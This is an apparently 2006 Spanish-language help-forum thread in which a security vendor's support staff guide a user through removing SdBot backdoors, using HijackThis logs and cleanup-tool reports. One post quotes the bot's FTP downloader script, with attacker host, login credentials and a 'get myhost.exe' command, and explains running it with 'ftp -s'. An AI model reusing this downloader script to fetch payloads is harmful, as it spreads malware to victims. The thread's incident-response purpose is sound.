creo que tengo un marciano (continuará...)

Mensaje por **msc hotline sat** » 10 Feb 2006, 11:20

Entonces el fichero no sirve para nada, no llego por messenger y la ip del script "i" que es de Almeria no sé como llegó a ru ordenador ... :lol:

Amplia detalles de esto del mwnsaje de shuthown pero que no se apaga.

Te lo hace arrancando en modo seguro ???

Solo si estas conectada a Internet ???

En alguna aplicacion en concreto ???

Mira si se para con Inicio -> Ejecutar -> SHUTDOWN -A

y nos cuentas el resultado, gracias

saludos

ms, 10.2.2006

mindtram · Mensaje por **mindtram** » 10 Feb 2006, 11:26

en modo seguro no lo hace.Solo cuando estoy conectada.Me sale una vez el mensaje pero se agota el tiempo y no pasa nada.Lo que me dices que haga lohago solocuando salga el mensaje ¿no?.Y con lo que me sale en ad aware que hago?

mindtram · Mensaje por **mindtram** » 10 Feb 2006, 11:57

mando dos archivos que me detecta el ewido

Mensaje por **msc hotline sat** » 10 Feb 2006, 11:59

Primero abre el "i" y nos lo pegas en tu proximo post, luego eliminas todo lo que te detecta

Y posteanos de nuevo un log actual del HJT, a ver si entre los BHO vemos alguno que te lance alguna aplicacion rarilla cuando abres el navegador ...

saludos

ms, 10-2-2006

mindtram · Mensaje por **mindtram** » 10 Feb 2006, 12:04

no puedo encontrarlo,me lo detecta el etrust pero voy a system 32 y a simple vista no esta,¿estara oculto? y aqui pego el hjt

Logfile of HijackThis v1.99.1

Scan saved at 12:02:55, on 10/02/2006

Platform: Windows XP SP1 (WinNT 5.01.2600)

MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:

C:\WINDOWS\System32\smss.exe

C:\WINDOWS\system32\winlogon.exe

C:\WINDOWS\system32\services.exe

C:\WINDOWS\system32\lsass.exe

C:\WINDOWS\system32\svchost.exe

C:\WINDOWS\System32\svchost.exe

C:\WINDOWS\system32\spoolsv.exe

C:\Archivos de programa\ewido anti-malware\ewidoctrl.exe

C:\Archivos de programa\ewido anti-malware\ewidoguard.exe

C:\Archivos de programa\Ahead\InCD\InCDsrv.exe

C:\WINDOWS\AppPatch\Patches32\svchost.exe

C:\WINDOWS\AppPatch\Patches32\csrss.exe

C:\WINDOWS\System32\hphmon05.exe

C:\WINDOWS\System32\spool\drivers\w32x86\3\hpztsb09.exe

C:\Archivos de programa\Hewlett-Packard\HP Software Update\HPWuSchd.exe

C:\Archivos de programa\HP\hpcoretech\hpcmpmgr.exe

C:\Archivos de programa\Ahead\InCD\InCD.exe

C:\Archivos de programa\Messenger\msmsgs.exe

C:\WINDOWS\System32\ctfmon.exe

C:\Archivos de programa\Telefonica\Kit ADSL USB\dslmon.exe

C:\Archivos de programa\Telefonica\KitAIM\AimMon.exe

C:\Archivos de programa\WinZip\WZQKPICK.EXE

C:\WINDOWS\System32\HPZipm12.exe

C:\Archivos de programa\HP\hpcoretech\comp\hptskmgr.exe

C:\WINDOWS\explorer.exe

C:\Archivos de programa\Internet Explorer\IEXPLORE.EXE

C:\Archivos de programa\BitSpirit\BitSpirit.exe

C:\WINDOWS\System32\pnpmgr.exe

C:\Archivos de programa\Internet Explorer\IEXPLORE.EXE

C:\Documents and Settings\yolanda\Mis documentos\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.es

R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =

R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =

R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =

R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Vínculos

O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Archivos de programa\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll

O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\archivos de programa\google\googletoolbar1.dll

O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx

O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\archivos de programa\google\googletoolbar1.dll

O4 - HKLM\..\Run: [NeroCheck] C:\WINDOWS\system32\NeroCheck.exe

O4 - HKLM\..\Run: [HPHUPD05] C:\Archivos de programa\Hewlett-Packard\{45B6180B-DCAB-4093-8EE8-6164457517F0}\hphupd05.exe

O4 - HKLM\..\Run: [HPHmon05] C:\WINDOWS\System32\hphmon05.exe

O4 - HKLM\..\Run: [HPDJ Taskbar Utility] C:\WINDOWS\System32\spool\drivers\w32x86\3\hpztsb09.exe

O4 - HKLM\..\Run: [HP Software Update] "C:\Archivos de programa\Hewlett-Packard\HP Software Update\HPWuSchd.exe"

O4 - HKLM\..\Run: [HP Component Manager] "C:\Archivos de programa\HP\hpcoretech\hpcmpmgr.exe"

O4 - HKLM\..\Run: [AgenteADSL_15] C:\Archivos de programa\Telefonica\KitAIM\AimExDll.exe AimGestA.dll 4

O4 - HKLM\..\Run: [taskbar.exe] C:\dm.exe

O4 - HKLM\..\Run: [Microsoft Secure Module] msmd.exe

O4 - HKLM\..\Run: [AVG7_CC] C:\ARCHIV~1\Grisoft\AVGFRE~1\avgcc.exe /STARTUP

O4 - HKLM\..\Run: [InCD] C:\Archivos de programa\Ahead\InCD\InCD.exe

O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k

O4 - HKLM\..\Run: [Microsoft Stpnlg] stuffnplug.exe

O4 - HKLM\..\Run: [Microsoft Spng] stfnplug.exe

O4 - HKLM\..\Run: [adiras] adiras.exe

O4 - HKLM\..\RunServices: [System Management] rundIl.exe

O4 - HKLM\..\RunServices: [Microsoft Stpnlg] stuffnplug.exe

O4 - HKLM\..\RunServices: [Microsoft Spng] stfnplug.exe

O4 - HKLM\..\RunServices: [Microsoft Secure Module] msmd.exe

O4 - HKCU\..\Run: [MSMSGS] "C:\Archivos de programa\Messenger\msmsgs.exe" /background

O4 - HKCU\..\Run: [System Management] rundIl.exe

O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\ctfmon.exe

O4 - HKCU\..\RunServices: [System Management] rundIl.exe

O4 - HKCU\..\RunServices: [Microsoft Stpnlg] stuffnplug.exe

O4 - HKCU\..\RunServices: [Microsoft Spng] stfnplug.exe

O4 - Global Startup: Consola KIT ADSL.lnk = ?

O4 - Global Startup: Inicio rápido de Adobe Reader.lnk = C:\Archivos de programa\Adobe\Acrobat 7.0\Reader\reader_sl.exe

O4 - Global Startup: WinZip Quick Pick.lnk = C:\Archivos de programa\WinZip\WZQKPICK.EXE

O8 - Extra context menu item: &Google Search - res://C:\Archivos de programa\Google\GoogleToolbar1.dll/cmsearch.html

O8 - Extra context menu item: &Translate English Word - res://C:\Archivos de programa\Google\GoogleToolbar1.dll/cmwordtrans.html

O8 - Extra context menu item: Backward Links - res://C:\Archivos de programa\Google\GoogleToolbar1.dll/cmbacklinks.html

O8 - Extra context menu item: Cached Snapshot of Page - res://C:\Archivos de programa\Google\GoogleToolbar1.dll/cmcache.html

O8 - Extra context menu item: Descargar con &BitSpirit - C:\ARCHIV~1\BITSPI~1\bsurl.htm

O8 - Extra context menu item: Similar Pages - res://C:\Archivos de programa\Google\GoogleToolbar1.dll/cmsimilar.html

O8 - Extra context menu item: Translate Page into English - res://C:\Archivos de programa\Google\GoogleToolbar1.dll/cmtrans.html

O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - (no file)

O16 - DPF: {0EB0E74A-2A76-4AB3-A7FB-9BD8C29F7F75} (CKAVWebScan Object) - http://www.kaspersky.com/downloads/kws/kavwebscan_unicode.cab

O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204

O16 - DPF: {7B297BFD-85E4-4092-B2AF-16A91B2EA103} (WScanCtl Class) - http://www3.ca.com/securityadvisor/virusinfo/webscan.cab

O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} (Java Runtime Environment 1.4.1_01) -

O16 - DPF: {CAFEEFAC-0014-0001-0001-ABCDEFFEDCBA} (Java Runtime Environment 1.4.1_01) -

O17 - HKLM\System\CCS\Services\Tcpip\..\{46246E6C-9594-49E7-B619-AC46E990B164}: NameServer = 80.58.61.250 80.58.61.254

O20 - Winlogon Notify: Control Panel - C:\WINDOWS\system32\lvlm0931e.dll (file missing)

O20 - Winlogon Notify: Explorer - C:\WINDOWS\system32\p4r40e9qeh.dll (file missing)

O20 - Winlogon Notify: opnnm - opnnm.dll (file missing)

O20 - Winlogon Notify: tuvuv - tuvuv.dll (file missing)

O23 - Service: Automatic Update Service (Automatic Update) - Unknown owner - C:\WINDOWS\System32\wuapi.exe (file missing)

O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - Unknown owner - C:\ARCHIV~1\Grisoft\AVGFRE~1\avgamsvr.exe (file missing)

O23 - Service: AVG7 Update Service (Avg7UpdSvc) - Unknown owner - C:\ARCHIV~1\Grisoft\AVGFRE~1\avgupsvc.exe (file missing)

O23 - Service: AVG E-mail Scanner (AVGEMS) - Unknown owner - C:\ARCHIV~1\Grisoft\AVGFRE~1\avgemc.exe (file missing)

O23 - Service: ewido security suite control - ewido networks - C:\Archivos de programa\ewido anti-malware\ewidoctrl.exe

O23 - Service: ewido security suite guard - ewido networks - C:\Archivos de programa\ewido anti-malware\ewidoguard.exe

O23 - Service: InCD File System Service (InCDsrv) - AHEAD Software - C:\Archivos de programa\Ahead\InCD\InCDsrv.exe

O23 - Service: Microsoft Dynamic Network (MDNetwork) - Unknown owner - C:\WINDOWS\system32\MDN.exe (file missing)

O23 - Service: Network Monitor - Unknown owner - C:\Archivos de programa\Network Monitor\netmon.exe (file missing)

O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\System32\HPZipm12.exe

O23 - Service: Universal Plug and Play Manager (PnP Manager) - Unknown owner - C:\WINDOWS\System32\pnpmgr.exe

O23 - Service: Microsoft Windows Update Service (Windows Update Service) - Unknown owner - C:\WINDOWS\services.exe (file missing)

Mensaje por **msc hotline sat** » 10 Feb 2006, 12:05

Y efectivamente, el shutdown -a hazlo cuando estes en la cuenta atrás, para saber si realmente es un shutdown de windows lo que ves o un JOKE ...

saludos

ms, 10-2-2006

Mensaje por **msc hotline sat** » 10 Feb 2006, 12:35

Los ficheros que nos has enviado son .PF o sea prefetch, y no sirven mas que para acelerar la carga de los EXE correspondientes, pero los que sirven e interesa que nos envies son los EXE reales, gracias

Y dinos qué encuentra en ellos el EWIDO... para empezar a hacer boca... :lol: :lol: :lol:

saludos

ms, 10-2-2006

mindtram · Mensaje por **mindtram** » 10 Feb 2006, 17:11

el ewido me detecta uns archivos que ya he enviado.

---------------------------------------------------------

ewido anti-malware - Report de exploración

---------------------------------------------------------

+ Creado en: 17:10:56, 10/02/2006

+ Report-Checksum: A593DE7E

+ Scan result:

C:\WINDOWS\system32\qaz -> Downloader.Ftp.bw : Ignorado

C:\Documents and Settings\yolanda\Configuración local\Temp\SERVICES.EXE.Muestra EliTriIP v1.86 -> Backdoor.SdBot.xd : Limpio con backup

C:\Documents and Settings\yolanda\Cookies\yolanda@atdmt[2].txt -> TrackingCookie.Atdmt : Limpio con backup

::Fin Report

mindtram · Mensaje por **mindtram** » 10 Feb 2006, 17:13

diceque tengo un backdoor.codbot.ba

Mensaje por **msc hotline sat** » 10 Feb 2006, 17:25

Hemos recibido el qaz que es similar al "i" anterior, y el otro es otra variante de SDBOT.

Lo que no hemos recibido es la muestra del SERVICES.EXE que te pedía el ELITRIIP

Envia lo que puedas y el lunes lo miramos. Ahora nos vamos ya pues los viernes por la tarde hacemos semana inglesa :lol:

salydos

ms. 10-2-2006

mindtram · Mensaje por **mindtram** » 12 Feb 2006, 12:04

mando lo que me pedia el elitripy dos mas que me detecta ewido

Mensaje por **msc hotline sat** » 13 Feb 2006, 03:30

Pues cuando lleguemos a la oficina las analizamos y procedemos en consecuencia

saludos

ms. 13-2-2006

Mensaje por **msc hotline sat** » 13 Feb 2006, 11:46

Recibidas 5 muertras, el QAZ es un scrupt de ftp, similar a los "i" , propio de los SDBOT, pero esta vez no apunta a una IP, sino a una web :

open xman.acid-burn.info 21

user ftplogx

ftpP4ssX

binary

get myhost.exe

bye

posiblemente del hacker, o desde donde este gace la descarga, esta ver por el por el port 21

Luego el fichero !"__DELETE_ON_REBOOT__PNPMGR.EXE" es otra variante de SDBOT que pasamos a controlar y eliminar con la nueva version del ELITRIIP de hoy, pero los otros tres ficheros, SERVICES.EXE , SMLOGSVC,EXE y SMSS.EXE son los del sistema operativom bo los malware que debe tener en otra carpeta

Voy a mirar donde se le pedian y prosigo...

Mensaje por **msc hotline sat** » 13 Feb 2006, 12:28

No veo Infosat.txt reciente donde ver las muestras que se te piden, pero al mirar en el ultimo HJT llamas en tres claves a uno claramente malwarte, el RUNDIL,EXE, fuhate que no es RUNDLL sino RUNDIL , faculmente confundibles en minusculas, y que ya te pediamos en una lista que te pedimos, pero si ya no lo tienes, debes eliminar las claves que lo contengan.

O4 - HKLM\..\RunServices: [System Management] rundIl.exe

O4 - HKCU\..\Run: [System Management] rundIl.exe

O4 - HKCU\..\RunServices: [System Management] rundIl.exe

y aparte posteanos el C:\INFOSAT.TXT, gracias

saludos

NOTA: Y si tuvieras con atributos de oculto o de sistema cualquiera de los ficheros de la lista que te pediamos en su dia, eliminales los atrubutos y envianoslos, pues sino estarás siempre igual...

ms, 13-2-2006

Mensaje por **msc hotline sat** » 13 Feb 2006, 17:00

Subida a esta wev nueva version del ELITRIIP;

---v1.88---(13 de Febrero del 2006) (Muestra de Sdbot.worm.gen.J "PNPMGR.EXE" y para los Mytobs.-PD)

Con ello se controla hasta la ultima muestra de SDBOY

saludos

ms, 13-2-2006

mindtram · Mensaje por **mindtram** » 14 Feb 2006, 10:56

se me queda bloqueado el elistara.Lo he borrado y bueltoa instalar pero no va

mindtram · Mensaje por **mindtram** » 14 Feb 2006, 10:58

este es el infosat cuando paso el elitrip

Tue Feb 07 18:21:10 2006

EliTriIP v1.86 (c)2006 S.G.H. / Satinfo S.L.

---------------------------------------------

Lista de Acciones (por Acción Directa):

(Valor "MICROSOFT SERVICE PACK UPDATE")

Por favor, envienos una muestra del fichero

C:\WINDOWS\SYSTEM32\msspupd.exe

a "virus@satinfo.es". Gracias.

C:\WINDOWS\SYSTEM32\SYSHOST.EXE --> Eliminado

Por favor, envienos una muestra del fichero

C:\DOCUME~1\YOLANDA\CONFIG~1\TEMP\SERVICES.EXE.Muestra EliTriIP v1.86

a "virus@satinfo.es". Gracias.

C:\WINDOWS\SERVICES.EXE --> Renombrado a .VIR

Linea Eliminada del HOSTS --> 127.0.0.1 sds-qckads.com

Linea Eliminada del HOSTS --> 127.0.0.1 status.qckads.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.qoolaid.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.qoologic.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.CLKPrecision.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.urllogic.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.clkoptimizer.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.isearch.com

Linea Eliminada del HOSTS --> 127.0.0.1 isearch.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.idownload.com

Linea Eliminada del HOSTS --> 127.0.0.1 idownload.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.mytotalsearch.com

Linea Eliminada del HOSTS --> 127.0.0.1 mytotalsearch.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.lop.com

Linea Eliminada del HOSTS --> 127.0.0.1 lop.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.websearch.com

Linea Eliminada del HOSTS --> 127.0.0.1 websearch.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.page-not-found.net

Linea Eliminada del HOSTS --> 127.0.0.1 page-not-found.net

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.isearchhere.com

Linea Eliminada del HOSTS --> 127.0.0.1 isearchhere.com

Linea Eliminada del HOSTS --> 127.0.0.1 as.adwave.com

Linea Eliminada del HOSTS --> 127.0.0.1 sr.adwave.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.adwave.com

Linea Eliminada del HOSTS --> 127.0.0.1 adwave.com EVENT:HOST:127.0.0.1

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.pacimedia.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.exactsearch.net

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.contextplus.net

Tue Feb 07 18:24:22 2006

EliTriIP v1.86 (c)2006 S.G.H. / Satinfo S.L.

---------------------------------------------

Lista de Acciones (por Acción Directa):

(Valor "MICROSOFT SERVICE PACK UPDATE")

Por favor, envienos una muestra del fichero

C:\WINDOWS\SYSTEM32\msspupd.exe

a "virus@satinfo.es". Gracias.

Linea Eliminada del HOSTS --> 127.0.0.1 sds-qckads.com

Linea Eliminada del HOSTS --> 127.0.0.1 status.qckads.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.qoolaid.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.qoologic.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.CLKPrecision.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.urllogic.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.clkoptimizer.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.isearch.com

Linea Eliminada del HOSTS --> 127.0.0.1 isearch.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.idownload.com

Linea Eliminada del HOSTS --> 127.0.0.1 idownload.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.mytotalsearch.com

Linea Eliminada del HOSTS --> 127.0.0.1 mytotalsearch.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.lop.com

Linea Eliminada del HOSTS --> 127.0.0.1 lop.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.websearch.com

Linea Eliminada del HOSTS --> 127.0.0.1 websearch.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.page-not-found.net

Linea Eliminada del HOSTS --> 127.0.0.1 page-not-found.net

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.isearchhere.com

Linea Eliminada del HOSTS --> 127.0.0.1 isearchhere.com

Linea Eliminada del HOSTS --> 127.0.0.1 as.adwave.com

Linea Eliminada del HOSTS --> 127.0.0.1 sr.adwave.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.adwave.com

Linea Eliminada del HOSTS --> 127.0.0.1 adwave.com EVENT:HOST:127.0.0.1

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.pacimedia.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.exactsearch.net

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.contextplus.net

Tue Feb 07 19:04:09 2006

EliStartPage v11.11 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Key Eliminada [WinLogon\Notify\CONTROL PANEL] -> C:\WINDOWS\SYSTEM32\LVLM0931E.DLL

C:\WINDOWS\SYSTEM32\GUARD.TMP --> Eliminado Look2Me

C:\WINDOWS\SYSTEM32\LVLM0931E.DLL --> Eliminado Look2Me

Linea Eliminada del HOSTS --> 127.0.0.1 sds-qckads.com

Linea Eliminada del HOSTS --> 127.0.0.1 status.qckads.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.qoolaid.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.qoologic.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.CLKPrecision.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.urllogic.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.clkoptimizer.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.isearch.com

Linea Eliminada del HOSTS --> 127.0.0.1 isearch.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.idownload.com

Linea Eliminada del HOSTS --> 127.0.0.1 idownload.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.mytotalsearch.com

Linea Eliminada del HOSTS --> 127.0.0.1 mytotalsearch.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.lop.com

Linea Eliminada del HOSTS --> 127.0.0.1 lop.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.websearch.com

Linea Eliminada del HOSTS --> 127.0.0.1 websearch.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.page-not-found.net

Linea Eliminada del HOSTS --> 127.0.0.1 page-not-found.net

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.isearchhere.com

Linea Eliminada del HOSTS --> 127.0.0.1 isearchhere.com

Linea Eliminada del HOSTS --> 127.0.0.1 as.adwave.com

Linea Eliminada del HOSTS --> 127.0.0.1 sr.adwave.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.adwave.com

Linea Eliminada del HOSTS --> 127.0.0.1 adwave.com EVENT:HOST:127.0.0.1

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.pacimedia.com

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.exactsearch.net

Linea Eliminada del HOSTS --> 127.0.0.1 http://www.contextplus.net

Eliminadas las Paginas de Inicio y de Busqueda del IE

Eliminados Ficheros Temporales del IE

Tue Feb 07 19:07:29 2006

EliStartPage v11.11 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Exploración):

C:\WINDOWS\system32\m0pola731d.dll --> Eliminado, Look2Me

C:\WINDOWS\system32\__delete_on_reboot__kadgr1.dll --> Eliminado, Look2Me

Tue Feb 07 19:33:01 2006

EliTriIP v1.86 (c)2006 S.G.H. / Satinfo S.L.

---------------------------------------------

Lista de Acciones (por Acción Directa):

(Valor "MICROSOFT SERVICE PACK UPDATE")

Por favor, envienos una muestra del fichero

C:\WINDOWS\SYSTEM32\msspupd.exe

a "virus@satinfo.es". Gracias.

Tue Feb 07 19:34:46 2006

EliStartPage v11.11 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminadas las Paginas de Inicio y de Busqueda del IE

Eliminados Ficheros Temporales del IE

Wed Feb 08 10:28:42 2006

EliTriIP v1.86 (c)2006 S.G.H. / Satinfo S.L.

---------------------------------------------

Lista de Acciones (por Acción Directa):

(Valor "MICROSOFT SERVICE PACK UPDATE")

Por favor, envienos una muestra del fichero

C:\WINDOWS\SYSTEM32\msspupd.exe

a "virus@satinfo.es". Gracias.

Wed Feb 08 10:31:00 2006

EliStartPage v11.11 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminadas las Paginas de Inicio y de Busqueda del IE

Eliminados Ficheros Temporales del IE

Thu Feb 09 11:54:59 2006

EliTriIP v1.87 (c)2006 S.G.H. / Satinfo S.L.

---------------------------------------------

Lista de Acciones (por Acción Directa):

C:\WINDOWS\SYSTEM32\MSSPUPD.EXE --> Eliminado

Entrada Eliminada [HKCU\...\Run] "MICROSOFT SERVICE PACK UPDATE"="msspupd.exe"

Entrada Eliminada [HKLM\...\Run] "MICROSOFT SERVICE PACK UPDATE"="msspupd.exe"

Entrada Eliminada [HKLM\...\RunServices] "MICROSOFT SERVICE PACK UPDATE"="msspupd.exe"

Thu Feb 09 11:55:33 2006

EliTriIP v1.87 (c)2006 S.G.H. / Satinfo S.L.

---------------------------------------------

Lista de Acciones (por Exploración):

C:\Documents and Settings\yolanda\Escritorio\msspupd.exe --> Eliminado, SdBot.worm.gen.G

Thu Feb 09 11:56:57 2006

EliStartPage v11.12 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminadas las Paginas de Inicio y de Busqueda del IE

Eliminados Ficheros Temporales del IE

Thu Feb 09 12:08:46 2006

EliStartPage v11.12 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminadas las Paginas de Inicio y de Busqueda del IE

Eliminados Ficheros Temporales del IE

Thu Feb 09 12:16:07 2006

EliStartPage v11.12 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminadas las Paginas de Inicio y de Busqueda del IE

Eliminados Ficheros Temporales del IE

Thu Feb 09 12:54:26 2006

EliStartPage v11.12 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminadas las Paginas de Inicio y de Busqueda del IE

Eliminados Ficheros Temporales del IE

Thu Feb 09 15:01:53 2006

EliStartPage v11.12 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminadas las Paginas de Inicio y de Busqueda del IE

Eliminados Ficheros Temporales del IE

Thu Feb 09 18:27:10 2006

EliStartPage v11.12 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminadas las Paginas de Inicio y de Busqueda del IE

Eliminados Ficheros Temporales del IE

Thu Feb 09 18:36:29 2006

EliStartPage v11.13 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminadas las Paginas de Inicio y de Busqueda del IE

Eliminados Ficheros Temporales del IE

Thu Feb 09 18:36:36 2006

EliStartPage v11.13 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Exploración):

C:\Documents and Settings\yolanda\Escritorio\winsysupd5.exe --> Eliminado, DCToolBar

Fri Feb 10 11:40:40 2006

EliStartPage v11.13 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminadas las Paginas de Inicio y de Busqueda del IE

Eliminados Ficheros Temporales del IE

Sun Feb 12 12:12:16 2006

EliStartPage v11.14 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminadas las Paginas de Inicio y de Busqueda del IE

Eliminados Ficheros Temporales del IE

Sun Feb 12 12:12:46 2006

EliStartPage v11.14 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminadas las Paginas de Inicio y de Busqueda del IE

Eliminados Ficheros Temporales del IE

Mon Feb 13 16:22:13 2006

EliStartPage v11.14 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminadas las Paginas de Inicio y de Busqueda del IE

Mon Feb 13 16:52:51 2006

EliStartPage v11.14 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminadas las Paginas de Inicio y de Busqueda del IE

Mon Feb 13 16:53:20 2006

EliStartPage v11.14 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminadas las Paginas de Inicio y de Busqueda del IE

Tue Feb 14 10:21:20 2006

EliStartPage v11.14 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

C:\WINDOWS\WEB\RELATED.HTM --> Eliminado

Eliminadas las Paginas de Inicio y de Busqueda del IE

Tue Feb 14 10:37:02 2006

EliStartPage v11.15 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminadas las Paginas de Inicio y de Busqueda del IE

Tue Feb 14 10:44:26 2006

EliStartPage v11.15 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminadas las Paginas de Inicio y de Busqueda del IE

Tue Feb 14 10:49:50 2006

EliTriIP v1.88 (c)2006 S.G.H. / Satinfo S.L.

---------------------------------------------

Lista de Acciones (por Exploración):

C:\WINDOWS\system32\TFTP2324 --> Eliminado, SdBot.worm.gen.H

Tue Feb 14 10:50:44 2006

EliStartPage v11.15 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminadas las Paginas de Inicio y de Busqueda del IE

Tue Feb 14 10:51:06 2006

EliStartPage v11.15 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminadas las Paginas de Inicio y de Busqueda del IE

Mensaje por **msc hotline sat** » 14 Feb 2006, 11:20

http://sarc.com/avcenter/venc/data/adware.broadcastpc.b.html

Ben, pues el ELITRIIP ha detectado y eliminado el nuevo SdBot

El ELISTARA no hace falta , pero si quieres lanzalo en modo segurpo y di a todo que NO, y explora,, a ver si asi llegas al final

saludos

ms, 14-2-2006

mindtram · Mensaje por **mindtram** » 15 Feb 2006, 17:08

con el etrust me vuelve a salir que tengo el virus Bat.FTP.downloader en el archivo " i "

Mensaje por **msc hotline sat** » 15 Feb 2006, 17:21

Señal que te intenta intrusionar de nuevo. Es la manera pomo cpmsoguemn descargar SDBOT y compañia...

Pero si te lo impiode el antivirus, lo impide !

Suni, ehecyrando un ftp -s:i descargarías el fochero que se iondica en el script, desde la URL indicada y a traves del port indicado, por FTP (File Transfer Protocol)

saludos

ms, 15-2-2006

mindtram · Mensaje por **mindtram** » 15 Feb 2006, 18:41

sinceramente no entiendo tu mensaje anterior.El elistara si le doy a todo que no si funciona.Algun bicho pero gordo tengo que tener porque esto va mu lentito,pero no me detecta nada.Te pongo el infosat

Tue Feb 07 18:21:10 2006

EliTriIP v1.86 (c)2006 S.G.H. / Satinfo S.L.

---------------------------------------------

